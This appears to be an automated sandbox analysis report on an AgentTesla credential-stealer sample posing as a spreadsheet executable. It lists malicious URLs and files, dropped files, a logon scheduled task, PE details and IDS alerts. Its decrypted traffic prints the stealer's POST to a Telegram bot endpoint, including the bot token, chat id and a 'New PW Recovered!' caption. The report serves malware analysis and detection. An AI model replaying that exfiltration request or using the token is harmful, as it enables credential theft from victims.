3b5074b1b5d032e5620f69f9f700ff0e | https://www.google.com.bh/url?hl=en&q=https://www.google.com.bh/url?hl%3Den%26q%3Dhttp://www.google.com/amp/www.google.com/amp/www.google.com/amp/%252574%252569%25256E%252579%252575%252572%25256C%25252E%252563%25256F%25256D%25252F%25256D%252576%252574%252575%252575%252566%252537%252533%26source%3Dgmail%26ust%3D1716286979743000%26usg%3DAOvVaw0kIG15Hao_4RLWdhQSbrTj&source=gmail&ust=1716287016979000&usg=AOvVaw2OvZXU7t2_QCy0TjxskKGn | malicious | Unknown | 149.154.167.220
3b5074b1b5d032e5620f69f9f700ff0e | New Order.exe | malicious | Unknown | 149.154.167.220
3b5074b1b5d032e5620f69f9f700ff0e | New Order.exe | malicious | Unknown | 149.154.167.220
3b5074b1b5d032e5620f69f9f700ff0e | http://twomancake.com | malicious | Unknown | 149.154.167.220
3b5074b1b5d032e5620f69f9f700ff0e | Doc1000050789.exe | malicious | AgentTesla, PureLog Stealer | 149.154.167.220
3b5074b1b5d032e5620f69f9f700ff0e | https://zoomzle.com | malicious | Unknown | 149.154.167.220
3b5074b1b5d032e5620f69f9f700ff0e | rSipari__PO408232023_ZNG__stanbul_pdf.exe | malicious | AgentTesla | 149.154.167.220
                                            No context
                                            Process:C:\Users\user\Desktop\RFQ-101432620247fl#U00e2#U00aexslx.exe
                                            File Type:ASCII text, with CRLF line terminators
                                            Category:dropped
                                            Size (bytes):1415
                                            Entropy (8bit):5.352427679901606
                                            Encrypted:false
                                            SSDEEP:24:MLUE4K5E4KH1qE4qXKDE4KhKiKhPE4KMRuAE4KzecKIE4oKNzKorE4x84j:MIHK5HKH1qHiYHKh3oPHKMRuAHKzectP
                                            MD5:3978978DE913FD1C068312697D6E5917
                                            SHA1:1DABBE7FB8F38F6EBF474CE5F0ECAA89F48E2538
                                            SHA-256:33B7B1668DDD3AB39711F9F93B667F6F2F674348A79228BFA163BA625B37F120
                                            SHA-512:78694B97F5D03758F503155E5CE5B85AABDF9690F0DFBC51FCE9926BE2D86BCF99E008659420F1E8489A7F6EA125F2776D4C6DC4B151566B529454512352953D
                                            Malicious:false
                                            Reputation:moderate, very likely benign file
                                            Preview:1,"fusion","GAC",0..1,"WinRT","NotApp",1..2,"System.Windows.Forms, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089",0..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System\920e3d1d70447c3c10e69e6df0766568\System.ni.dll",0..2,"System.Drawing, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a",0..3,"System.Core, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Core\8b2c1203fd20aea8260bfbc518004720\System.Core.ni.dll",0..3,"System.Data, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Data\1b8c564fd69668e6e62d136259980d9e\System.Data.ni.dll",0..3,"System.Xml, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Xml\2062ed810929ec0e33254c02b0c61bb4\System.Xml.ni.dll"
                                            Process:C:\Users\user\AppData\Roaming\ywKDUBCUA.exe
                                            File Type:ASCII text, with CRLF line terminators
                                            Category:dropped
                                            Size (bytes):1415
                                            Entropy (8bit):5.352427679901606
                                            Encrypted:false
                                            SSDEEP:24:MLUE4K5E4KH1qE4qXKDE4KhKiKhPE4KMRuAE4KzecKIE4oKNzKorE4x84j:MIHK5HKH1qHiYHKh3oPHKMRuAHKzectP
                                            MD5:3978978DE913FD1C068312697D6E5917
                                            SHA1:1DABBE7FB8F38F6EBF474CE5F0ECAA89F48E2538
                                            SHA-256:33B7B1668DDD3AB39711F9F93B667F6F2F674348A79228BFA163BA625B37F120
                                            SHA-512:78694B97F5D03758F503155E5CE5B85AABDF9690F0DFBC51FCE9926BE2D86BCF99E008659420F1E8489A7F6EA125F2776D4C6DC4B151566B529454512352953D
                                            Malicious:false
                                            Reputation:moderate, very likely benign file
                                            Preview:1,"fusion","GAC",0..1,"WinRT","NotApp",1..2,"System.Windows.Forms, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089",0..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System\920e3d1d70447c3c10e69e6df0766568\System.ni.dll",0..2,"System.Drawing, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a",0..3,"System.Core, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Core\8b2c1203fd20aea8260bfbc518004720\System.Core.ni.dll",0..3,"System.Data, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Data\1b8c564fd69668e6e62d136259980d9e\System.Data.ni.dll",0..3,"System.Xml, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Xml\2062ed810929ec0e33254c02b0c61bb4\System.Xml.ni.dll"
                                            Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                            File Type:data
                                            Category:dropped
                                            Size (bytes):2232
                                            Entropy (8bit):5.380747059108785
                                            Encrypted:false
                                            SSDEEP:48:lylWSU4xymI4RfoUeW+gZ9tK8NPZHUxL7u1iMuge//MPUyus:lGLHxvIIwLgZ2KRHWLOugss
                                            MD5:B9CC5EFE1FBFE7397745E31421CA5C07
                                            SHA1:604EEA678D7007BA23FBC85A5A550F4596B1ACCB
                                            SHA-256:0005DDD738AFA412C3B0ACB08186879CF788634D076242DC9DA13EC595EB7775
                                            SHA-512:CB9B6917A2A94C8AB476C4F4547284F7BB81A2F8AA8E75C8982E277A3F78F6D2408FDC82BEBD9C5EC56ADB8C2C1C1D9DE7A0F51285D86D39C74415A6D2508FA3
                                            Malicious:false
                                            Preview:@...e.................................^..............@..........P................1]...E.....j.....(.Microsoft.PowerShell.Commands.ManagementH...............o..b~.D.poM......... .Microsoft.PowerShell.ConsoleHost0......................C.l]..7.s........System..4....................D...{..|f........System.Core.D...............4..7..D.#V.............System.Management.Automation<...............i..VdqF...|...........System.Configuration4.................%...K... ...........System.Xml..L.................*gQ?O.....x5.......#.Microsoft.Management.Infrastructure.<................t.,.lG....M...........System.Management...@................z.U..G...5.f.1........System.DirectoryServices8..................1...L..U;V.<}........System.Numerics.4.....................@.[8]'.\........System.Data.H................WY..2.M.&..g*(g........Microsoft.PowerShell.Security...<...............V.}...@...i...........System.Transactions.P...............8..{...@.e..."4.......%.Microsoft.PowerShell.Com
                                            Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                            File Type:ASCII text, with no line terminators
                                            Category:dropped
                                            Size (bytes):60
                                            Entropy (8bit):4.038920595031593
                                            Encrypted:false
                                            SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                            MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                            SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                            SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                            SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                            Malicious:false
                                            Preview:# PowerShell test file to determine AppLocker lockdown mode
                                            Process:C:\Users\user\Desktop\RFQ-101432620247fl#U00e2#U00aexslx.exe
                                            File Type:XML 1.0 document, ASCII text
                                            Category:dropped
                                            Size (bytes):1582
                                            Entropy (8bit):5.108523968555501
                                            Encrypted:false
                                            SSDEEP:24:2di4+S2qhlZ1Muy1my3UnrKMhEMOFGpwOzNgU3ODOiIQRvh7hwrgXuNtZxvn:cgergYrFdOFzOzN33ODOiDdKrsuTPv
                                            MD5:F74479BA23197628839C67A71C1068FC
                                            SHA1:27E80B3E9F1F0ACD52709A9A1C6B68DBC06FFDBE
                                            SHA-256:C054F245E4AD46B910C3157CA0D353E2DCD3D98B046B56074ECEE00552BB4417
                                            SHA-512:0BBF39B949C0A188F87E69640AE620A2DEE76498AF799BB10E53BBA727101726CD83EF8004FFC8666808586E2605B5C57229F213272CE5ADABCA24217171EFD4
                                            Malicious:true
                                            Preview:<?xml version="1.0" encoding="UTF-16"?>.<Task version="1.2" xmlns="http://schemas.microsoft.com/windows/2004/02/mit/task">. <RegistrationInfo>. <Date>2014-10-25T14:27:44.8929027</Date>. <Author>user-PC\user</Author>. </RegistrationInfo>. <Triggers>. <LogonTrigger>. <Enabled>true</Enabled>. <UserId>user-PC\user</UserId>. </LogonTrigger>. <RegistrationTrigger>. <Enabled>false</Enabled>. </RegistrationTrigger>. </Triggers>. <Principals>. <Principal id="Author">. <UserId>user-PC\user</UserId>. <LogonType>InteractiveToken</LogonType>. <RunLevel>LeastPrivilege</RunLevel>. </Principal>. </Principals>. <Settings>. <MultipleInstancesPolicy>StopExisting</MultipleInstancesPolicy>. <DisallowStartIfOnBatteries>false</DisallowStartIfOnBatteries>. <StopIfGoingOnBatteries>true</StopIfGoingOnBatteries>. <AllowHardTerminate>false</AllowHardTerminate>. <StartWhenAvailable>true</StartWhenAvailable>. <RunOnlyIfNetwor
                                            Process:C:\Users\user\AppData\Roaming\ywKDUBCUA.exe
                                            File Type:XML 1.0 document, ASCII text
                                            Category:dropped
                                            Size (bytes):1582
                                            Entropy (8bit):5.108523968555501
                                            Encrypted:false
                                            SSDEEP:24:2di4+S2qhlZ1Muy1my3UnrKMhEMOFGpwOzNgU3ODOiIQRvh7hwrgXuNtZxvn:cgergYrFdOFzOzN33ODOiDdKrsuTPv
                                            MD5:F74479BA23197628839C67A71C1068FC
                                            SHA1:27E80B3E9F1F0ACD52709A9A1C6B68DBC06FFDBE
                                            SHA-256:C054F245E4AD46B910C3157CA0D353E2DCD3D98B046B56074ECEE00552BB4417
                                            SHA-512:0BBF39B949C0A188F87E69640AE620A2DEE76498AF799BB10E53BBA727101726CD83EF8004FFC8666808586E2605B5C57229F213272CE5ADABCA24217171EFD4
                                            Malicious:false
                                            Preview:<?xml version="1.0" encoding="UTF-16"?>.<Task version="1.2" xmlns="http://schemas.microsoft.com/windows/2004/02/mit/task">. <RegistrationInfo>. <Date>2014-10-25T14:27:44.8929027</Date>. <Author>user-PC\user</Author>. </RegistrationInfo>. <Triggers>. <LogonTrigger>. <Enabled>true</Enabled>. <UserId>user-PC\user</UserId>. </LogonTrigger>. <RegistrationTrigger>. <Enabled>false</Enabled>. </RegistrationTrigger>. </Triggers>. <Principals>. <Principal id="Author">. <UserId>user-PC\user</UserId>. <LogonType>InteractiveToken</LogonType>. <RunLevel>LeastPrivilege</RunLevel>. </Principal>. </Principals>. <Settings>. <MultipleInstancesPolicy>StopExisting</MultipleInstancesPolicy>. <DisallowStartIfOnBatteries>false</DisallowStartIfOnBatteries>. <StopIfGoingOnBatteries>true</StopIfGoingOnBatteries>. <AllowHardTerminate>false</AllowHardTerminate>. <StartWhenAvailable>true</StartWhenAvailable>. <RunOnlyIfNetwor
                                            Process:C:\Users\user\Desktop\RFQ-101432620247fl#U00e2#U00aexslx.exe
                                            File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                            Category:dropped
                                            Size (bytes):767496
                                            Entropy (8bit):7.773686109262418
                                            Encrypted:false
                                            SSDEEP:12288:6PoO3mXWQxhFtF1aTxk/THYL9zkFSr1amot3ScRjg6GeJq5k4mvp9QtmYJn3KSrZ:6To/xhHHadkLHSaDLXGJmvpWtxJlrk0
                                            MD5:626130B6E15538C11F7C38C2FE4A6039
                                            SHA1:706CA5AC781496076D1604536B9CE10AC1F62EE1
                                            SHA-256:B89D6BE0BCFB915492BEB7AE726F815DCF289A284E650C200BDA4FAF5DB60FA1
                                            SHA-512:2C27353EA0BC04CD0B015DCCD340749EA4D91C58AB249CFA30B7BC5C546A76D85F6D096E650D64C3CD891F1D75B92FE93F67961B93ECD890A86C877032572024
                                            Malicious:true
                                            Antivirus:
                                            • Antivirus: Avira, Detection: 100%
                                            • Antivirus: Joe Sandbox ML, Detection: 100%
                                            • Antivirus: ReversingLabs, Detection: 83%
                                            Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....I.f..............0......p.......+... ...@....@.. ....................................@..................................*..O....@...i...............6........................................................... ............... ..H............text........ ...................... ..`.rsrc....i...@...l..................@..@.reloc...............|..............@..B........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                            Process:C:\Users\user\Desktop\RFQ-101432620247fl#U00e2#U00aexslx.exe
                                            File Type:ASCII text, with CRLF line terminators
                                            Category:dropped
                                            Size (bytes):26
                                            Entropy (8bit):3.95006375643621
                                            Encrypted:false
                                            SSDEEP:3:ggPYV:rPYV
                                            MD5:187F488E27DB4AF347237FE461A079AD
                                            SHA1:6693BA299EC1881249D59262276A0D2CB21F8E64
                                            SHA-256:255A65D30841AB4082BD9D0EEA79D49C5EE88F56136157D8D6156AEF11C12309
                                            SHA-512:89879F237C0C051EBE784D0690657A6827A312A82735DA42DAD5F744D734FC545BEC9642C19D14C05B2F01FF53BC731530C92F7327BB7DC9CDE1B60FB21CD64E
                                            Malicious:false
                                            Preview:[ZoneTransfer]....ZoneId=0
                                            File type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                            Entropy (8bit):7.773686109262418
                                            TrID:
                                            • Win32 Executable (generic) Net Framework (10011505/4) 50.01%
                                            • Win32 Executable (generic) a (10002005/4) 49.96%
                                            • Win16/32 Executable Delphi generic (2074/23) 0.01%
                                            • Generic Win/DOS Executable (2004/3) 0.01%
                                            • DOS Executable Generic (2002/1) 0.01%
                                            File name:RFQ-101432620247fl#U00e2#U00aexslx.exe
                                            File size:767'496 bytes
                                            MD5:626130b6e15538c11f7c38c2fe4a6039
                                            SHA1:706ca5ac781496076d1604536b9ce10ac1f62ee1
                                            SHA256:b89d6be0bcfb915492beb7ae726f815dcf289a284e650c200bda4faf5db60fa1
                                            SHA512:2c27353ea0bc04cd0b015dccd340749ea4d91c58ab249cfa30b7bc5c546a76d85f6d096e650d64c3cd891f1d75b92fe93f67961b93ecd890a86c877032572024
                                            SSDEEP:12288:6PoO3mXWQxhFtF1aTxk/THYL9zkFSr1amot3ScRjg6GeJq5k4mvp9QtmYJn3KSrZ:6To/xhHHadkLHSaDLXGJmvpWtxJlrk0
                                            TLSH:D8F49E91A5E405CDC0F7DEBE8FC11703EFA059168C25CE8A689543CB54E6B83F925B2B
                                            File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....I.f..............0......p.......+... ...@....@.. ....................................@................................
                                            Icon Hash:8f818c848c88874f
                                            Entrypoint:0x4b2b16
                                            Entrypoint Section:.text
                                            Digitally signed:true
                                            Imagebase:0x400000
                                            Subsystem:windows gui
                                            Image File Characteristics:EXECUTABLE_IMAGE, 32BIT_MACHINE
                                            DLL Characteristics:DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
                                            Time Stamp:0x660349FD [Tue Mar 26 22:19:41 2024 UTC]
                                            TLS Callbacks:
                                            CLR (.Net) Version:
                                            OS Version Major:4
                                            OS Version Minor:0
                                            File Version Major:4
                                            File Version Minor:0
                                            Subsystem Version Major:4
                                            Subsystem Version Minor:0
                                            Import Hash:f34d5f2d4577ed6d9ceec516c1f5a744
                                            Signature Valid:false
                                            Signature Issuer:CN=COMODO RSA Code Signing CA, O=COMODO CA Limited, L=Salford, S=Greater Manchester, C=GB
                                            Signature Validation Error:The digital signature of the object did not verify
                                            Error Number:-2146869232
                                             Not Before:13/11/2018 01:00:00
                                             Not After:09/11/2021 00:59:59
                                            Subject Chain
                                            • CN=Simon Tatham, O=Simon Tatham, L=Cambridge, S=Cambridgeshire, C=GB
                                            Version:3
                                            Thumbprint MD5:DABD77E44EF6B3BB91740FA46696B779
                                            Thumbprint SHA-1:5B9E273CF11941FD8C6BE3F038C4797BBE884268
                                            Thumbprint SHA-256:4CD3325617EBB63319BA6E8F2A74B0B8CCA58920B48D8026EBCA2C756630D570
                                            Serial:7C1118CBBADC95DA3752C46E47A27438
                                            Instruction
                                            jmp dword ptr [00402000h]
                                            Data directories (Name | Virtual Address | Virtual Size | Is in Section)
                                            IMAGE_DIRECTORY_ENTRY_EXPORT | 0x0 | 0x0 | -
                                            IMAGE_DIRECTORY_ENTRY_IMPORT | 0xb2ac4 | 0x4f | .text
                                            IMAGE_DIRECTORY_ENTRY_RESOURCE | 0xb4000 | 0x69ec | .rsrc
                                            IMAGE_DIRECTORY_ENTRY_EXCEPTION | 0x0 | 0x0 | -
                                            IMAGE_DIRECTORY_ENTRY_SECURITY | 0xb8000 | 0x3608 | - (file offset, outside all sections)
                                            IMAGE_DIRECTORY_ENTRY_BASERELOC | 0xbc000 | 0xc | .reloc
                                            IMAGE_DIRECTORY_ENTRY_DEBUG | 0x0 | 0x0 | -
                                            IMAGE_DIRECTORY_ENTRY_COPYRIGHT | 0x0 | 0x0 | -
                                            IMAGE_DIRECTORY_ENTRY_GLOBALPTR | 0x0 | 0x0 | -
                                            IMAGE_DIRECTORY_ENTRY_TLS | 0x0 | 0x0 | -
                                            IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG | 0x0 | 0x0 | -
                                            IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT | 0x0 | 0x0 | -
                                            IMAGE_DIRECTORY_ENTRY_IAT | 0x2000 | 0x8 | .text
                                            IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT | 0x0 | 0x0 | -
                                            IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR | 0x2008 | 0x48 | .text
                                            IMAGE_DIRECTORY_ENTRY_RESERVED | 0x0 | 0x0 | -
                                            Notes: the SECURITY entry is a raw file offset, not an RVA; 0xb8000 + 0x3608 = 0xbb608 = 767'496 bytes, exactly the file size recorded in the process records below, so the Authenticode blob is the last 13'832 bytes of the file. A populated COM_DESCRIPTOR entry (the CLR header at RVA 0x2008) and an 8-byte IAT holding a single thunk identify the sample as a .NET executable.
                                            Sections (Name | Virtual Address | Virtual Size | Raw Size | MD5 | Xored PE | ZLIB Complexity | File Type | Entropy | Characteristics)
                                            .text | 0x2000 | 0xb0b1c | 0xb0c00 | 3a3e13eea5ee6f14687716fe148a0068 | False | 0.8759337429278642 | data | 7.804264542022236 | IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                                            .rsrc | 0xb4000 | 0x69ec | 0x6c00 | 2f43d42ece5aa337a83535200c33dfb4 | False | 0.4643012152777778 | data | 6.148496436974665 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                            .reloc | 0xbc000 | 0xc | 0x400 | dfaf882d08d530afde182ed4d819e151 | False | 0.025390625 | data | 0.05585530805374581 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ
                                            Notes: .text is 0xb0c00 of the file's 0xbb608 bytes and has entropy 7.80 with ZLIB complexity 0.88, i.e. almost the entire section is incompressible. Plain IL code does not look like that; the section carries an encrypted or compressed second stage. Consistently, the AgentTesla and TelegramRAT YARA matches in the process records below hit heap memory of the running processes (for example 0x44C2000 in target 0), not the file image, so the real payload only becomes visible after the sample unpacks it at run time.
                                            Resources (Name | RVA | Size | Type | Language | Country | ZLIB Complexity)
                                            RT_ICON | 0xb41d8 | 0x468 | Device independent bitmap graphic, 16 x 32 x 32, image size 1024, resolution 5906 x 5906 px/m | - | - | 0.48404255319148937
                                            RT_ICON | 0xb4640 | 0x988 | Device independent bitmap graphic, 24 x 48 x 32, image size 2304, resolution 5906 x 5906 px/m | - | - | 0.35737704918032787
                                            RT_ICON | 0xb4fc8 | 0x10a8 | Device independent bitmap graphic, 32 x 64 x 32, image size 4096, resolution 5906 x 5906 px/m | - | - | 0.30417448405253283
                                            RT_ICON | 0xb6070 | 0x25a8 | Device independent bitmap graphic, 48 x 96 x 32, image size 9216, resolution 5906 x 5906 px/m | - | - | 0.1849585062240664
                                            RT_ICON | 0xb8618 | 0x2093 | PNG image data, 256 x 256, 8-bit/color RGBA, non-interlaced | - | - | 0.9666626693848184
                                            RT_GROUP_ICON | 0xba6ac | 0x4c | data | - | - | 0.75
                                            RT_GROUP_ICON | 0xba6f8 | 0x14 | data | - | - | 1.05
                                            RT_VERSION | 0xba70c | 0x2e0 | data | - | - | 0.44429347826086957
                                            Imports (DLL | Import)
                                            mscoree.dll | _CorExeMain
                                            Note: _CorExeMain is the CLR entry stub that every managed executable imports. The Win32 APIs the stealer actually calls are resolved by the runtime at load time, so the import table is not a capability indicator for this sample.
                                            IDS alerts (Timestamp | Protocol | SID | Message | Source Port | Dest Port | Source IP | Dest IP)
                                            05/22/24-17:27:00.989462 | TCP | 2851779 | ETPRO TROJAN Agent Tesla Telegram Exfil | 49712 | 443 | 192.168.2.5 | 149.154.167.220
                                            05/22/24-17:26:58.094926 | TCP | 2851779 | ETPRO TROJAN Agent Tesla Telegram Exfil | 49709 | 443 | 192.168.2.5 | 149.154.167.220
                                            Note: both alerts coincide with the client packets at 17:26:58.094 and 17:27:00.989 in the TCP list below, i.e. the 918-byte multipart upload each session sends right after the server's 100 Continue. The HTTPS session dumps further down are the decrypted contents of these two TLS connections; a sensor that does not intercept TLS sees only DNS and SNI for api.telegram.org, which is also legitimate traffic.
                                            TCP packets (Timestamp | Source Port | Dest Port | Source IP | Dest IP)
                                            May 22, 2024 17:26:57.088270903 CEST | 49709 | 443 | 192.168.2.5 | 149.154.167.220
                                            May 22, 2024 17:26:57.088315964 CEST | 443 | 49709 | 149.154.167.220 | 192.168.2.5
                                            May 22, 2024 17:26:57.088382959 CEST | 49709 | 443 | 192.168.2.5 | 149.154.167.220
                                            May 22, 2024 17:26:57.110867023 CEST | 49709 | 443 | 192.168.2.5 | 149.154.167.220
                                            May 22, 2024 17:26:57.110891104 CEST | 443 | 49709 | 149.154.167.220 | 192.168.2.5
                                            May 22, 2024 17:26:57.761758089 CEST | 443 | 49709 | 149.154.167.220 | 192.168.2.5
                                            May 22, 2024 17:26:57.761854887 CEST | 49709 | 443 | 192.168.2.5 | 149.154.167.220
                                            May 22, 2024 17:26:57.768841982 CEST | 49709 | 443 | 192.168.2.5 | 149.154.167.220
                                            May 22, 2024 17:26:57.768861055 CEST | 443 | 49709 | 149.154.167.220 | 192.168.2.5
                                            May 22, 2024 17:26:57.769318104 CEST | 443 | 49709 | 149.154.167.220 | 192.168.2.5
                                            May 22, 2024 17:26:57.823657036 CEST | 49709 | 443 | 192.168.2.5 | 149.154.167.220
                                            May 22, 2024 17:26:57.851416111 CEST | 49709 | 443 | 192.168.2.5 | 149.154.167.220
                                            May 22, 2024 17:26:57.898497105 CEST | 443 | 49709 | 149.154.167.220 | 192.168.2.5
                                            May 22, 2024 17:26:58.094490051 CEST | 443 | 49709 | 149.154.167.220 | 192.168.2.5
                                            May 22, 2024 17:26:58.094852924 CEST | 49709 | 443 | 192.168.2.5 | 149.154.167.220
                                            May 22, 2024 17:26:58.094878912 CEST | 443 | 49709 | 149.154.167.220 | 192.168.2.5
                                            May 22, 2024 17:26:58.941207886 CEST | 443 | 49709 | 149.154.167.220 | 192.168.2.5
                                            May 22, 2024 17:26:58.941984892 CEST | 443 | 49709 | 149.154.167.220 | 192.168.2.5
                                            May 22, 2024 17:26:58.942074060 CEST | 49709 | 443 | 192.168.2.5 | 149.154.167.220
                                            May 22, 2024 17:26:58.944734097 CEST | 49709 | 443 | 192.168.2.5 | 149.154.167.220
                                            May 22, 2024 17:27:00.029994011 CEST | 49712 | 443 | 192.168.2.5 | 149.154.167.220
                                            May 22, 2024 17:27:00.030030966 CEST | 443 | 49712 | 149.154.167.220 | 192.168.2.5
                                            May 22, 2024 17:27:00.030148983 CEST | 49712 | 443 | 192.168.2.5 | 149.154.167.220
                                            May 22, 2024 17:27:00.033742905 CEST | 49712 | 443 | 192.168.2.5 | 149.154.167.220
                                            May 22, 2024 17:27:00.033770084 CEST | 443 | 49712 | 149.154.167.220 | 192.168.2.5
                                            May 22, 2024 17:27:00.673270941 CEST | 443 | 49712 | 149.154.167.220 | 192.168.2.5
                                            May 22, 2024 17:27:00.673458099 CEST | 49712 | 443 | 192.168.2.5 | 149.154.167.220
                                            May 22, 2024 17:27:00.675250053 CEST | 49712 | 443 | 192.168.2.5 | 149.154.167.220
                                            May 22, 2024 17:27:00.675278902 CEST | 443 | 49712 | 149.154.167.220 | 192.168.2.5
                                            May 22, 2024 17:27:00.675523996 CEST | 443 | 49712 | 149.154.167.220 | 192.168.2.5
                                            May 22, 2024 17:27:00.725646019 CEST | 49712 | 443 | 192.168.2.5 | 149.154.167.220
                                            May 22, 2024 17:27:00.770490885 CEST | 443 | 49712 | 149.154.167.220 | 192.168.2.5
                                            May 22, 2024 17:27:00.988750935 CEST | 443 | 49712 | 149.154.167.220 | 192.168.2.5
                                            May 22, 2024 17:27:00.989404917 CEST | 49712 | 443 | 192.168.2.5 | 149.154.167.220
                                            May 22, 2024 17:27:00.989413977 CEST | 443 | 49712 | 149.154.167.220 | 192.168.2.5
                                            May 22, 2024 17:27:01.719639063 CEST | 443 | 49712 | 149.154.167.220 | 192.168.2.5
                                            May 22, 2024 17:27:01.719718933 CEST | 443 | 49712 | 149.154.167.220 | 192.168.2.5
                                            May 22, 2024 17:27:01.719851017 CEST | 49712 | 443 | 192.168.2.5 | 149.154.167.220
                                            May 22, 2024 17:27:01.720688105 CEST | 49712 | 443 | 192.168.2.5 | 149.154.167.220
                                            UDP packets (Timestamp | Source Port | Dest Port | Source IP | Dest IP)
                                            May 22, 2024 17:26:57.064552069 CEST | 58081 | 53 | 192.168.2.5 | 1.1.1.1
                                            May 22, 2024 17:26:57.076679945 CEST | 53 | 58081 | 1.1.1.1 | 192.168.2.5
                                            DNS queries (Timestamp | Source IP | Dest IP | Trans ID | OP Code | Name | Type | Class | DNS over HTTPS)
                                            May 22, 2024 17:26:57.064552069 CEST | 192.168.2.5 | 1.1.1.1 | 0x3962 | Standard query (0) | api.telegram.org | A (IP address) | IN (0x0001) | false
                                            DNS answers (Timestamp | Source IP | Dest IP | Trans ID | Reply Code | Name | CName | Address | Type | Class | DNS over HTTPS)
                                            May 22, 2024 17:26:57.076679945 CEST | 1.1.1.1 | 192.168.2.5 | 0x3962 | No error (0) | api.telegram.org | - | 149.154.167.220 | A (IP address) | IN (0x0001) | false
                                            • api.telegram.org
                                            HTTPS session (Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process)
                                            0 | 192.168.2.5 | 49709 | 149.154.167.220 | 443 | 6224 | C:\Users\user\Desktop\RFQ-101432620247fl#U00e2#U00aexslx.exe
                                            Decrypted traffic (Timestamp | Bytes transferred | Direction | Data)
                                            2024-05-22 15:26:57 UTC | 260 | OUT | POST /bot7156462915:AAE3EIUy20eRSFdNZcqhQa0y1tAvt8IT_oY/sendDocument HTTP/1.1
                                            Content-Type: multipart/form-data; boundary=---------------------------8dc7a52168f7017
                                            Host: api.telegram.org
                                            Content-Length: 918
                                            Expect: 100-continue
                                            Connection: Keep-Alive
                                            2024-05-22 15:26:58 UTC | 25 | IN | HTTP/1.1 100 Continue
                                            2024-05-22 15:26:58 UTC | 918 | OUT | Data Raw: 0d 0a 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 38 64 63 37 61 35 32 31 36 38 66 37 30 31 37 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 63 68 61 74 5f 69 64 22 0d 0a 0d 0a 37 30 36 32 30 37 35 30 31 38 0d 0a 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 38 64 63 37 61 35 32 31 36 38 66 37 30 31 37 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 63 61 70 74 69 6f 6e 22 0d 0a 0d 0a 4e 65 77 20 50 57 20 52 65 63 6f 76 65 72 65 64 21 0a 0a 54 69 6d 65 3a 20 30 35 2f 32 32 2f 32 30 32 34 20 31 31 3a 32 36 3a 35 36 0a 55 73 65 72
                                            Data Ascii: -----------------------------8dc7a52168f7017Content-Disposition: form-data; name="chat_id"7062075018-----------------------------8dc7a52168f7017Content-Disposition: form-data; name="caption"New PW Recovered!Time: 05/22/2024 11:26:56User
                                            2024-05-22 15:26:58 UTC | 1007 | IN | HTTP/1.1 200 OK
                                            Server: nginx/1.18.0
                                            Date: Wed, 22 May 2024 15:26:58 GMT
                                            Content-Type: application/json
                                            Content-Length: 619
                                            Connection: close
                                            Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                                            Access-Control-Allow-Origin: *
                                            Access-Control-Allow-Methods: GET, POST, OPTIONS
                                            Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
